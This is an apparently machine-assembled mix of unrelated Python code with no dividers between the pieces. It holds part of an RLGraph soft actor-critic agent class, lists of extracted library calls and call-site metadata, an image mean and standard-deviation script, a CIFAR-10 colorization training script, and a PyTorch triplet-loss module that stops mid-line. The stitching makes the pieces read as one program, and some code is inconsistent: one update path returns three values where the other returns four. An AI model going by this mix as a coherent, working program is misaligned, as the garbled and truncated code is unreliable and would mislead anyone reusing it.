if self.update_spec["sync_interval"] / self.update_spec["update_interval"] != \
self.update_spec["sync_interval"] // self.update_spec["update_interval"]:
raise RLGraphError(
"ERROR: sync_interval ({}) must be multiple of update_interval "
"({})!".format(self.update_spec["sync_interval"], self.update_spec["update_interval"])
)
elif "sync_tau" in self.update_spec:
if self.update_spec["sync_tau"] <= 0 or self.update_spec["sync_tau"] > 1.0:
raise RLGraphError(
"sync_tau ({}) must be in interval (0.0, 1.0]!".format(self.update_spec["sync_tau"])
)
else:
self.update_spec["sync_tau"] = 0.005 # The value mentioned in the paper
# Extend input Space definitions to this Agent's specific API-methods.
preprocessed_state_space = self.preprocessed_state_space.with_batch_rank()
reward_space = FloatBox(add_batch_rank=True)
terminal_space = BoolBox(add_batch_rank=True)
#self.iterations = self.update_spec["num_iterations"]
self.batch_size = self.update_spec["batch_size"]
float_action_space = self.action_space.with_batch_rank().map(
mapping=lambda flat_key, space: space.as_one_hot_float_space() if isinstance(space, IntBox) else space
)
self.input_spaces.update(dict(
env_actions=self.action_space.with_batch_rank(),
actions=float_action_space,
preprocessed_states=preprocessed_state_space,
rewards=reward_space,
terminals=terminal_space,
next_states=preprocessed_state_space,
states=self.state_space.with_batch_rank(add_batch_rank=True),
batch_size=int,
importance_weights=FloatBox(add_batch_rank=True),
deterministic=bool,
weights="variables:{}".format(self.policy.scope)
))
if value_function_sync_spec is None:
value_function_sync_spec = SyncSpecification(
sync_interval=self.update_spec["sync_interval"] // self.update_spec["update_interval"],
sync_tau=self.update_spec["sync_tau"] if "sync_tau" in self.update_spec else 5e-3
)
self.memory = Memory.from_spec(memory_spec)
self.alpha_optimizer = self.optimizer.copy(scope="alpha-" + self.optimizer.scope) if self.target_entropy is not None else None
self.root_component = SACAgentComponent(
agent=self,
policy=self.policy,
q_function=self.value_function,
preprocessor=self.preprocessor,
memory=self.memory,
discount=self.discount,
initial_alpha=self.initial_alpha,
target_entropy=target_entropy,
optimizer=self.optimizer,
vf_optimizer=self.value_function_optimizer,
alpha_optimizer=self.alpha_optimizer,
q_sync_spec=value_function_sync_spec,
num_q_functions=2 if self.double_q is True else 1
)
extra_optimizers = [self.value_function_optimizer]
if self.alpha_optimizer is not None:
extra_optimizers.append(self.alpha_optimizer)
self.build_options = dict(optimizers=extra_optimizers)
if self.auto_build:
self._build_graph(
[self.root_component], self.input_spaces, optimizer=self.optimizer,
batch_size=self.update_spec["batch_size"],
build_options=self.build_options
)
self.graph_built = True
def set_weights(self, policy_weights, value_function_weights=None):
        # TODO: Overrides parent but should this be policy or value function?
return self.graph_executor.execute((self.root_component.set_policy_weights, policy_weights))
def get_weights(self):
return dict(policy_weights=self.graph_executor.execute(self.root_component.get_policy_weights))
def get_action(self, states, internals=None, use_exploration=True, apply_preprocessing=True, extra_returns=None,
time_percentage=None):
# TODO: common pattern - move to Agent
"""
Args:
extra_returns (Optional[Set[str],str]): Optional string or set of strings for additional return
values (besides the actions). Possible values are:
- 'preprocessed_states': The preprocessed states after passing the given states through the
preprocessor stack.
- 'internal_states': The internal states returned by the RNNs in the NN pipeline.
- 'used_exploration': Whether epsilon- or noise-based exploration was used or not.
Returns:
tuple or single value depending on `extra_returns`:
- action
- the preprocessed states
"""
extra_returns = {extra_returns} if isinstance(extra_returns, str) else (extra_returns or set())
# States come in without preprocessing -> use state space.
if apply_preprocessing:
call_method = self.root_component.get_preprocessed_state_and_action
batched_states, remove_batch_rank = self.state_space.force_batch(states)
else:
call_method = self.root_component.action_from_preprocessed_state
batched_states = states
remove_batch_rank = False
#remove_batch_rank = batched_states.ndim == np.asarray(states).ndim + 1
# Increase timesteps by the batch size (number of states in batch).
batch_size = len(batched_states)
self.timesteps += batch_size
# Control, which return value to "pull" (depending on `additional_returns`).
return_ops = [0, 1] if "preprocessed_states" in extra_returns else [0]
ret = force_list(self.graph_executor.execute((
call_method,
[batched_states, not use_exploration], # deterministic = not use_exploration
# 0=preprocessed_states, 1=action
return_ops
)))
        # Convert Gumbel (relaxed one-hot) sample back into int type for all discrete composite actions.
if isinstance(self.action_space, ContainerSpace):
ret[0] = ret[0].map(
mapping=lambda key, action: np.argmax(action, axis=-1).astype(action.dtype)
if isinstance(self.flat_action_space[key], IntBox) else action
)
elif isinstance(self.action_space, IntBox):
ret[0] = np.argmax(ret[0], axis=-1).astype(self.action_space.dtype)
if remove_batch_rank:
ret[0] = strip_list(ret[0])
if "preprocessed_states" in extra_returns:
return ret[0], ret[1]
else:
return ret[0]
def _observe_graph(self, preprocessed_states, actions, internals, rewards, next_states, terminals):
self.graph_executor.execute((self.root_component.insert_records, [preprocessed_states, actions, rewards, next_states, terminals]))
def update(self, batch=None, time_percentage=None, **kwargs):
if batch is None:
size = self.graph_executor.execute(self.root_component.get_memory_size)
# TODO: is this necessary?
if size < self.batch_size:
return 0.0, 0.0, 0.0
ret = self.graph_executor.execute((self.root_component.update_from_memory, [self.batch_size, time_percentage]))
else:
ret = self.graph_executor.execute((self.root_component.update_from_external_batch, [
batch["states"], batch["actions"], batch["rewards"], batch["terminals"], batch["next_states"],
batch["importance_weights"], time_percentage
]))
return ret["actor_loss"], ret["actor_loss_per_item"], ret["critic_loss"], ret["alpha_loss"]
def reset(self):
"""
Resets our preprocessor, but only if it contains stateful PreprocessLayer Components (meaning
the PreprocessorStack has at least one variable defined).
"""
if self.preprocessing_required and len(self.preprocessor.variables) > 0:
self.graph_executor.execute("reset_preprocessor")
self.graph_executor.execute(self.root_component.reset_targets)
def __repr__(self):
return "SACAgent(double-q={}, initial-alpha={}, target-entropy={})".format(
self.double_q, self.initial_alpha, self.target_entropy
)
|
[
"tensorflow.cond",
"numpy.argmax",
"tensorflow.identity",
"rlgraph.get_backend",
"torch.cat",
"tensorflow.assign",
"tensorflow.one_hot",
"rlgraph.components.ContainerMerger",
"tensorflow.concat",
"tensorflow.no_op",
"torch.exp",
"tensorflow.exp",
"rlgraph.spaces.BoolBox",
"rlgraph.utils.decorators.graph_fn",
"tensorflow.control_dependencies",
"rlgraph.spaces.space_utils.sanity_check_space",
"rlgraph.utils.decorators.rlgraph_api",
"tensorflow.assign_add",
"tensorflow.group",
"rlgraph.components.Memory.from_spec",
"rlgraph.spaces.FloatBox",
"rlgraph.utils.ops.flatten_op",
"rlgraph.components.Synchronizable",
"numpy.log",
"rlgraph.components.loss_functions.sac_loss_function.SACLossFunction",
"rlgraph.utils.ops.DataOpTuple",
"rlgraph.utils.util.strip_list"
] |
[((1376, 1389), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (1387, 1389), False, 'from rlgraph import get_backend\n'), ((5665, 5700), 'rlgraph.utils.decorators.rlgraph_api', 'rlgraph_api', ([], {'must_be_complete': '(False)'}), '(must_be_complete=False)\n', (5676, 5700), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((9067, 9143), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'flatten_ops': '(True)', 'split_ops': '(True)', 'add_auto_key_as_first_param': '(True)'}), '(flatten_ops=True, split_ops=True, add_auto_key_as_first_param=True)\n', (9075, 9143), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((9395, 9440), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'requires_variable_completeness': '(True)'}), '(requires_variable_completeness=True)\n', (9403, 9440), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((12222, 12270), 'rlgraph.utils.decorators.rlgraph_api', 'rlgraph_api', ([], {'requires_variable_completeness': '(True)'}), '(requires_variable_completeness=True)\n', (12233, 12270), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((12445, 12493), 'rlgraph.utils.decorators.rlgraph_api', 'rlgraph_api', ([], {'requires_variable_completeness': '(True)'}), '(requires_variable_completeness=True)\n', (12456, 12493), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((13512, 13568), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'returns': '(1)', 'requires_variable_completeness': '(True)'}), '(returns=1, requires_variable_completeness=True)\n', (13520, 13568), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((14302, 14358), 'rlgraph.utils.decorators.graph_fn', 'graph_fn', ([], {'returns': '(1)', 'requires_variable_completeness': '(True)'}), '(returns=1, requires_variable_completeness=True)\n', (14310, 14358), False, 'from rlgraph.utils.decorators import rlgraph_api, graph_fn\n'), ((1432, 1445), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (1443, 1445), False, 'from rlgraph import get_backend\n'), ((3710, 3812), 'rlgraph.components.loss_functions.sac_loss_function.SACLossFunction', 'SACLossFunction', ([], {'target_entropy': 'target_entropy', 'discount': 'discount', 'num_q_functions': 'num_q_functions'}), '(target_entropy=target_entropy, discount=discount,\n num_q_functions=num_q_functions)\n', (3725, 3812), False, 'from rlgraph.components.loss_functions.sac_loss_function import SACLossFunction\n'), ((3962, 3992), 'rlgraph.components.ContainerMerger', 'ContainerMerger', (['*memory_items'], {}), '(*memory_items)\n', (3977, 3992), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((4100, 4148), 'rlgraph.components.ContainerMerger', 'ContainerMerger', (['*q_names'], {'scope': '"""q_vars_merger"""'}), "(*q_names, scope='q_vars_merger')\n", (4115, 4148), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((9870, 9883), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (9881, 9883), False, 'from rlgraph import get_backend\n'), ((9908, 9927), 'rlgraph.utils.ops.flatten_op', 'flatten_op', (['actions'], {}), '(actions)\n', (9918, 9927), False, 'from rlgraph.utils.ops import flatten_op, DataOpTuple\n'), ((12785, 12798), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (12796, 12798), False, 'from rlgraph import get_backend\n'), ((15388, 15408), 
'tensorflow.group', 'tf.group', (['assign_ops'], {}), '(assign_ops)\n', (15396, 15408), True, 'import tensorflow as tf\n'), ((15622, 15680), 'tensorflow.cond', 'tf.cond', (['should_sync'], {'true_fn': 'assign_op', 'false_fn': 'tf.no_op'}), '(should_sync, true_fn=assign_op, false_fn=tf.no_op)\n', (15629, 15680), True, 'import tensorflow as tf\n'), ((15828, 15838), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (15836, 15838), True, 'import tensorflow as tf\n'), ((16552, 16598), 'tensorflow.assign', 'tf.assign', (['self.episode_reward', 'episode_reward'], {}), '(self.episode_reward, episode_reward)\n', (16561, 16598), True, 'import tensorflow as tf\n'), ((23282, 23311), 'rlgraph.spaces.FloatBox', 'FloatBox', ([], {'add_batch_rank': '(True)'}), '(add_batch_rank=True)\n', (23290, 23311), False, 'from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace\n'), ((23337, 23365), 'rlgraph.spaces.BoolBox', 'BoolBox', ([], {'add_batch_rank': '(True)'}), '(add_batch_rank=True)\n', (23344, 23365), False, 'from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace\n'), ((24614, 24643), 'rlgraph.components.Memory.from_spec', 'Memory.from_spec', (['memory_spec'], {}), '(memory_spec)\n', (24630, 24643), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((4882, 4944), 'rlgraph.spaces.space_utils.sanity_check_space', 'sanity_check_space', (['input_spaces[s]'], {'must_have_batch_rank': '(True)'}), '(input_spaces[s], must_have_batch_rank=True)\n', (4900, 4944), False, 'from rlgraph.spaces.space_utils import sanity_check_space\n'), ((9280, 9365), 'tensorflow.one_hot', 'tf.one_hot', (['env_actions'], {'depth': 'self.env_action_space[key].num_categories', 'axis': '(-1)'}), '(env_actions, depth=self.env_action_space[key].num_categories,\n axis=-1)\n', (9290, 9365), True, 'import tensorflow as tf\n'), ((9597, 9626), 'rlgraph.utils.ops.DataOpTuple', 'DataOpTuple', (['[self.log_alpha]'], {}), '([self.log_alpha])\n', (9608, 9626), False, 'from rlgraph.utils.ops import flatten_op, DataOpTuple\n'), ((10138, 10165), 'tensorflow.concat', 'tf.concat', (['actions'], {'axis': '(-1)'}), '(actions, axis=-1)\n', (10147, 10165), True, 'import tensorflow as tf\n'), ((12846, 12868), 'tensorflow.exp', 'tf.exp', (['self.log_alpha'], {}), '(self.log_alpha)\n', (12852, 12868), True, 'import tensorflow as tf\n'), ((13134, 13202), 'tensorflow.assign_add', 'tf.assign_add', (['self.agent.graph_executor.global_training_timestep', '(1)'], {}), '(self.agent.graph_executor.global_training_timestep, 1)\n', (13147, 13202), True, 'import tensorflow as tf\n'), ((13621, 13634), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (13632, 13634), False, 'from rlgraph import get_backend\n'), ((13665, 13709), 'tensorflow.assign_add', 'tf.assign_add', (['self.steps_since_last_sync', '(1)'], {}), '(self.steps_since_last_sync, 1)\n', (13678, 13709), True, 'import tensorflow as tf\n'), ((13981, 14076), 'tensorflow.cond', 'tf.cond', ([], {'pred': '(inc_op >= self.q_sync_spec.sync_interval)', 'true_fn': 'reset_op', 'false_fn': 'tf.no_op'}), '(pred=inc_op >= self.q_sync_spec.sync_interval, true_fn=reset_op,\n false_fn=tf.no_op)\n', (13988, 14076), True, 'import tensorflow as tf\n'), ((15694, 15735), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[cond_assign_op]'], {}), '([cond_assign_op])\n', (15717, 15735), True, 'import tensorflow as tf\n'), ((15756, 15766), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (15764, 15766), True, 
'import tensorflow as tf\n'), ((16057, 16070), 'rlgraph.get_backend', 'get_backend', ([], {}), '()\n', (16068, 16070), False, 'from rlgraph import get_backend\n'), ((16101, 16168), 'tensorflow.assign_add', 'tf.assign_add', (['self.agent.graph_executor.global_timestep', 'increment'], {}), '(self.agent.graph_executor.global_timestep, increment)\n', (16114, 16168), True, 'import tensorflow as tf\n'), ((28967, 28985), 'rlgraph.utils.util.strip_list', 'strip_list', (['ret[0]'], {}), '(ret[0])\n', (28977, 28985), False, 'from rlgraph.utils.util import strip_list, force_list\n'), ((5273, 5299), 'numpy.log', 'np.log', (['self.initial_alpha'], {}), '(self.initial_alpha)\n', (5279, 5299), True, 'import numpy as np\n'), ((10223, 10249), 'torch.cat', 'torch.cat', (['actions'], {'dim': '(-1)'}), '(actions, dim=-1)\n', (10232, 10249), False, 'import torch\n'), ((12923, 12948), 'torch.exp', 'torch.exp', (['self.log_alpha'], {}), '(self.log_alpha)\n', (12932, 12948), False, 'import torch\n'), ((13306, 13338), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['op_list'], {}), '(op_list)\n', (13329, 13338), True, 'import tensorflow as tf\n'), ((13451, 13461), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (13459, 13461), True, 'import tensorflow as tf\n'), ((13827, 13867), 'tensorflow.assign', 'tf.assign', (['self.steps_since_last_sync', '(0)'], {}), '(self.steps_since_last_sync, 0)\n', (13836, 13867), True, 'import tensorflow as tf\n'), ((14152, 14186), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[sync_op]'], {}), '([sync_op])\n', (14175, 14186), True, 'import tensorflow as tf\n'), ((14211, 14235), 'tensorflow.identity', 'tf.identity', (['should_sync'], {}), '(should_sync)\n', (14222, 14235), True, 'import tensorflow as tf\n'), ((15523, 15560), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[grouped_op]'], {}), '([grouped_op])\n', (15546, 15560), True, 'import tensorflow as tf\n'), ((15585, 15595), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (15593, 15595), True, 'import tensorflow as tf\n'), ((3041, 3057), 'rlgraph.components.Synchronizable', 'Synchronizable', ([], {}), '()\n', (3055, 3057), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((3401, 3417), 'rlgraph.components.Synchronizable', 'Synchronizable', ([], {}), '()\n', (3415, 3417), False, 'from rlgraph.components import Component, Synchronizable, Memory, ValueFunction, ContainerMerger, PrioritizedReplay\n'), ((13363, 13373), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (13371, 13373), True, 'import tensorflow as tf\n'), ((13889, 13918), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[op]'], {}), '([op])\n', (13912, 13918), True, 'import tensorflow as tf\n'), ((13947, 13957), 'tensorflow.no_op', 'tf.no_op', ([], {}), '()\n', (13955, 13957), True, 'import tensorflow as tf\n'), ((24136, 24165), 'rlgraph.spaces.FloatBox', 'FloatBox', ([], {'add_batch_rank': '(True)'}), '(add_batch_rank=True)\n', (24144, 24165), False, 'from rlgraph.spaces import FloatBox, BoolBox, IntBox, ContainerSpace\n'), ((15014, 15076), 'tensorflow.assign', 'tf.assign', (['dest_var', '(tau * source_var + (1.0 - tau) * dest_var)'], {}), '(dest_var, tau * source_var + (1.0 - tau) * dest_var)\n', (15023, 15076), True, 'import tensorflow as tf\n'), ((28856, 28882), 'numpy.argmax', 'np.argmax', (['ret[0]'], {'axis': '(-1)'}), '(ret[0], axis=-1)\n', (28865, 28882), True, 'import numpy as np\n'), ((28642, 28668), 
'numpy.argmax', 'np.argmax', (['action'], {'axis': '(-1)'}), '(action, axis=-1)\n', (28651, 28668), True, 'import numpy as np\n')]
|
import os
from PIL import Image
import numpy as np
## Compute the per-channel mean and variance of an image dataset
root_path = '../train_data'
_filename = os.listdir(root_path)
filename = []
for _file in _filename:
if not _file.endswith('.txt'):
filename.append(_file)
# running sum of per-image means
R_channel_m = 0
G_channel_m = 0
B_channel_m = 0
# running sum of per-image variances
R_channel_s = 0
G_channel_s = 0
B_channel_s = 0
num = len(filename)
for i in range(len(filename)):
img = Image.open(os.path.join(root_path, filename[i]))
img = img.convert('RGB')
img = np.array(img)
    img = img[:, :, ::-1]  # convert RGB to BGR
    img = img.astype(np.float32) / 255
B_channel_m = B_channel_m + np.sum(img[:, :, 0])/(img.shape[0]* img.shape[1])
G_channel_m = G_channel_m + np.sum(img[:, :, 1])/(img.shape[0]* img.shape[1])
R_channel_m = R_channel_m + np.sum(img[:, :, 2])/(img.shape[0]* img.shape[1])
B_mean = B_channel_m / num
G_mean = G_channel_m / num
R_mean = R_channel_m / num
for i in range(len(filename)):
img = Image.open(os.path.join(root_path, filename[i]))
img = img.convert('RGB')
img = np.array(img)
img = img[:, :, ::-1]
    img = img.astype(np.float32) / 255
    # channel 0 is B and channel 2 is R after the BGR conversion above
    B_channel_s = B_channel_s + np.sum(np.power(img[:, :, 0] - B_mean, 2)) / (img.shape[0] * img.shape[1])
    G_channel_s = G_channel_s + np.sum(np.power(img[:, :, 1] - G_mean, 2)) / (img.shape[0] * img.shape[1])
    R_channel_s = R_channel_s + np.sum(np.power(img[:, :, 2] - R_mean, 2)) / (img.shape[0] * img.shape[1])
B_std = np.sqrt(B_channel_s/num)
G_std = np.sqrt(G_channel_s/num)
R_std = np.sqrt(R_channel_s/num)
with open('mean_std.txt','w')as f:
text = "B_mean is %f, G_mean is %f, R_mean is %f" % (B_mean, G_mean, R_mean) + '\n' + "B_std is %f, G_std is %f, R_std is %f" % (B_std, G_std, R_std)
f.write(text)
print("B_mean is %f, G_mean is %f, R_mean is %f" % (B_mean, G_mean, R_mean))
print("B_std is %f, G_std is %f, R_std is %f" % (B_std, G_std, R_std))
|
[
"numpy.sum",
"numpy.power",
"numpy.array",
"os.path.join",
"os.listdir",
"numpy.sqrt"
] |
[((112, 133), 'os.listdir', 'os.listdir', (['root_path'], {}), '(root_path)\n', (122, 133), False, 'import os\n'), ((1446, 1472), 'numpy.sqrt', 'np.sqrt', (['(B_channel_s / num)'], {}), '(B_channel_s / num)\n', (1453, 1472), True, 'import numpy as np\n'), ((1479, 1505), 'numpy.sqrt', 'np.sqrt', (['(G_channel_s / num)'], {}), '(G_channel_s / num)\n', (1486, 1505), True, 'import numpy as np\n'), ((1512, 1538), 'numpy.sqrt', 'np.sqrt', (['(R_channel_s / num)'], {}), '(R_channel_s / num)\n', (1519, 1538), True, 'import numpy as np\n'), ((498, 511), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (506, 511), True, 'import numpy as np\n'), ((1048, 1061), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (1056, 1061), True, 'import numpy as np\n'), ((421, 457), 'os.path.join', 'os.path.join', (['root_path', 'filename[i]'], {}), '(root_path, filename[i])\n', (433, 457), False, 'import os\n'), ((971, 1007), 'os.path.join', 'os.path.join', (['root_path', 'filename[i]'], {}), '(root_path, filename[i])\n', (983, 1007), False, 'import os\n'), ((619, 639), 'numpy.sum', 'np.sum', (['img[:, :, 0]'], {}), '(img[:, :, 0])\n', (625, 639), True, 'import numpy as np\n'), ((701, 721), 'numpy.sum', 'np.sum', (['img[:, :, 1]'], {}), '(img[:, :, 1])\n', (707, 721), True, 'import numpy as np\n'), ((783, 803), 'numpy.sum', 'np.sum', (['img[:, :, 2]'], {}), '(img[:, :, 2])\n', (789, 803), True, 'import numpy as np\n'), ((1167, 1201), 'numpy.power', 'np.power', (['(img[:, :, 0] - R_mean)', '(2)'], {}), '(img[:, :, 0] - R_mean, 2)\n', (1175, 1201), True, 'import numpy as np\n'), ((1270, 1304), 'numpy.power', 'np.power', (['(img[:, :, 1] - G_mean)', '(2)'], {}), '(img[:, :, 1] - G_mean, 2)\n', (1278, 1304), True, 'import numpy as np\n'), ((1373, 1407), 'numpy.power', 'np.power', (['(img[:, :, 2] - B_mean)', '(2)'], {}), '(img[:, :, 2] - B_mean, 2)\n', (1381, 1407), True, 'import numpy as np\n')]
|
import argparse
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from torch.utils import data
from skimage import color
from PIL import Image
import matplotlib.pyplot as plt
from cnn_model import Model
# from cnn_model2 import Model as Model_unet
import pickle
from keras.datasets import cifar10
from sklearn.model_selection import train_test_split
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--image", type=str, required=False,
help="path to input black and white image")
parser.add_argument('--use_gpu', action='store_true', default=False,
help='whether to use GPU')
return parser.parse_args()
def preprocess_training_set(train):
processed_x = []
processed_y = []
for image in train:
l, ab = preprocess_image(image)
processed_x.append(l)
processed_y.append(ab)
return processed_x, processed_y
def preprocess_image(img, height=256, width=256):
"""Return the light intensity part of an image, resized and converted to tensor"""
# image = Image.open(img).convert('RGB')
# image_r = image.resize((width, height))
image_r_np = np.array(img) / 255.0
# Convert image to Lab format
image_lab = color.rgb2lab(image_r_np)
# Extract L dimension
image_l = image_lab[:,:,0]
image_ab = image_lab[:,:,1:]
# Convert to tensor and add relevant dimensions
image_l = image_l[None,:,:]
return image_l, image_ab
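# Shape sketch for preprocess_image, assuming an H x W x 3 uint8 RGB input
# (e.g. a 32 x 32 CIFAR-10 image): image_l comes back as (1, H, W) and
# image_ab as (H, W, 2) -- the lightness channel plus the two color channels.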
def postprocess_tens(orig_img, ab, mode='bilinear'):
# orig_img 1 x 1 x H_orig x W_orig
# ab 1 x 2 x H x W
HW_orig = orig_img.shape[2:]
HW = ab.shape[2:]
# Resize if needed
if(HW_orig[0]!=HW[0] or HW_orig[1]!=HW[1]):
ab_orig = F.interpolate(ab, size=HW_orig, mode=mode)
else:
ab_orig = ab
out_lab_orig = torch.cat((orig_img, ab_orig), dim=1)
out_lab_orig = out_lab_orig.data.cpu().numpy()
return color.lab2rgb(out_lab_orig.transpose((0,2,3,1)))
args = parse_arguments()
# image_dict = unpickle('C:\\Users\\karee\\Desktop\\ChromaPy\\data\\cifar-10-python\\cifar-10-batches-py\\data_batch_1')
# print(image_dict[b'data'])
(X, y), (x_test, y_test) = cifar10.load_data()
# Split data into training and validation
x_train, x_val, y_train, y_val = train_test_split(X, y, test_size=0.2, random_state=42)
og_image = x_train[0:10]
x_train, y_train = preprocess_training_set(x_train[:10])
x_val, y_val = preprocess_training_set(x_val[:10])
tensor_x_train = torch.Tensor(x_train).float()
tensor_x_val = torch.Tensor(x_val).float()
tensor_y_train = torch.Tensor(y_train).permute(0,3,1,2).float()
tensor_y_val = torch.Tensor(y_val).permute(0,3,1,2).float()
# Dataset dictionary
dsets = {
"train": data.TensorDataset(tensor_x_train,tensor_y_train),
"val": data.TensorDataset(tensor_x_val,tensor_y_val)}
dataloaders = {x : data.DataLoader(dsets[x], batch_size=6, shuffle=True)
for x in ['train', 'val']}
dataset_sizes = {x : len(dsets[x]) for x in ["train","val"]}
# model_unet = Model_unet(1,2)
# model_unet_ft = model_unet.fit(dataloaders,1)
# ab_out = model_unet_ft.forward(tensor_x_train[0:5])
model = Model()
model_ft = model.fit(dataloaders, 1)
ab_out = model_ft.forward(tensor_x_train[0:5])
image_new = postprocess_tens(tensor_x_train[0:5], ab_out)
f, axarr = plt.subplots(2,2)
axarr[0,0].imshow(og_image[0])
axarr[0,1].imshow(image_new[0])
axarr[1,0].imshow(og_image[1])
axarr[1,1].imshow(image_new[1])
plt.show()
|
[
"cnn_model.Model",
"matplotlib.pyplot.show",
"keras.datasets.cifar10.load_data",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"sklearn.model_selection.train_test_split",
"torch.cat",
"torch.Tensor",
"numpy.array",
"torch.utils.data.TensorDataset",
"torch.nn.functional.interpolate",
"matplotlib.pyplot.subplots",
"skimage.color.rgb2lab"
] |
[((2261, 2280), 'keras.datasets.cifar10.load_data', 'cifar10.load_data', ([], {}), '()\n', (2278, 2280), False, 'from keras.datasets import cifar10\n'), ((2357, 2411), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(X, y, test_size=0.2, random_state=42)\n', (2373, 2411), False, 'from sklearn.model_selection import train_test_split\n'), ((3237, 3244), 'cnn_model.Model', 'Model', ([], {}), '()\n', (3242, 3244), False, 'from cnn_model import Model\n'), ((3400, 3418), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {}), '(2, 2)\n', (3412, 3418), True, 'import matplotlib.pyplot as plt\n'), ((3544, 3554), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3552, 3554), True, 'import matplotlib.pyplot as plt\n'), ((487, 512), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (510, 512), False, 'import argparse\n'), ((1330, 1355), 'skimage.color.rgb2lab', 'color.rgb2lab', (['image_r_np'], {}), '(image_r_np)\n', (1343, 1355), False, 'from skimage import color\n'), ((1909, 1946), 'torch.cat', 'torch.cat', (['(orig_img, ab_orig)'], {'dim': '(1)'}), '((orig_img, ab_orig), dim=1)\n', (1918, 1946), False, 'import torch\n'), ((2807, 2857), 'torch.utils.data.TensorDataset', 'data.TensorDataset', (['tensor_x_train', 'tensor_y_train'], {}), '(tensor_x_train, tensor_y_train)\n', (2825, 2857), False, 'from torch.utils import data\n'), ((2869, 2915), 'torch.utils.data.TensorDataset', 'data.TensorDataset', (['tensor_x_val', 'tensor_y_val'], {}), '(tensor_x_val, tensor_y_val)\n', (2887, 2915), False, 'from torch.utils import data\n'), ((2936, 2989), 'torch.utils.data.DataLoader', 'data.DataLoader', (['dsets[x]'], {'batch_size': '(6)', 'shuffle': '(True)'}), '(dsets[x], batch_size=6, shuffle=True)\n', (2951, 2989), False, 'from torch.utils import data\n'), ((1258, 1271), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (1266, 1271), True, 'import numpy as np\n'), ((1815, 1857), 'torch.nn.functional.interpolate', 'F.interpolate', (['ab'], {'size': 'HW_orig', 'mode': 'mode'}), '(ab, size=HW_orig, mode=mode)\n', (1828, 1857), True, 'import torch.nn.functional as F\n'), ((2565, 2586), 'torch.Tensor', 'torch.Tensor', (['x_train'], {}), '(x_train)\n', (2577, 2586), False, 'import torch\n'), ((2610, 2629), 'torch.Tensor', 'torch.Tensor', (['x_val'], {}), '(x_val)\n', (2622, 2629), False, 'import torch\n'), ((2655, 2676), 'torch.Tensor', 'torch.Tensor', (['y_train'], {}), '(y_train)\n', (2667, 2676), False, 'import torch\n'), ((2717, 2736), 'torch.Tensor', 'torch.Tensor', (['y_val'], {}), '(y_val)\n', (2729, 2736), False, 'import torch\n')]
|
import myutils
from torch.nn import Module, Parameter
import torch.nn.functional as F
import torch
import torch.nn as nn
import numpy as np
class TripletLoss(Module):
def __init__(self, instance, margin=1.0):
super(TripletLoss, self).__init__()
self.margin = margin
self.instance = instance
def forward(self, inputs, targets, normalized=True):
norm_temp = inputs.norm(dim=1, p=2, keepdim=True)
if normalized:
inputs = inputs.div(norm_temp.expand_as(inputs))
nB = inputs.size(0)
idx_ = torch.arange(0, nB, dtype=torch.long)
dist = torch.pow(inputs, 2).sum(dim=1, keepdim=True).expand(nB, nB)
dist = dist + dist.t()
# use squared
dist.addmm_(1, -2, inputs, inputs.t()).clamp_(min=1e-12)
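        # The distance computation above uses the identity
        # ||x_i - x_j||^2 = ||x_i||^2 + ||x_j||^2 - 2 * <x_i, x_j>: `dist` starts as the
        # pairwise sum of squared norms and addmm_ subtracts twice the Gram matrix;
        # clamp_ guards against tiny negative values from floating-point error.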
adjacency = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
adjacency_not = ~adjacency
mask_ap = (adjacency.float() - torch.eye(nB).cuda()).long()
mask_an = adjacency_not.long()
dist_ap = (dist[mask_ap == 1]).view(-1, 1)
dist_an = (dist[mask_an == 1]).view(nB, -1)
dist_an = dist_an.repeat(1, self.instance - 1)
dist_an = dist_an.view(nB * (self.instance - 1), nB - self.instance)
num_loss = dist_an.size(0) * dist_an.size(1)
triplet_loss = torch.sum(
